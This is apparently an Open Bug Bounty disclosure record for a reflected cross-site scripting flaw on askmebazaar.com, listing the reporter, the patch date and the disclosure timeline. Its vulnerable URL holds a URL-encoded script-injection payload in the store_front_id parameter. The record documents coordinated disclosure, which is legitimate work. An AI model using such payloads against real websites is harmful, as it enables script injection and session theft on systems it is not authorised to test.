askmebazaar.com XSS vulnerability

2015-03-29T08:10:00
ID OBB:57016
Type openbugbounty
Reporter ErRoR_404_inDi
Modified 2015-04-04T21:08:00

Description

Vulnerable URL:
http://www.askmebazaar.com/index.php?store_front_id=%22%3E%3Cscript%3Ealert%28%27XSSPOSED+By+ErRoR_404%27%29%3C%2Fscript%3E&utm;_source=FB-SOK&utm;_medium=FBSOCPC&utm;_campaign=Askmebazaar_FB_0403_PPLA_FSH_Watches99_s_707
Details:

Description| Value
---|---
Patched:| Yes, at 19.05.2016
Latest check for patch:| 19.05.2016 08:14 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1996
Google Pagerank| 0
VIP website status:| Yes
Check askmebazaar.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 29 March, 2015 08:10 GMT
Vulnerability existence verified and confirmed| 4 April, 2015 21:08 GMT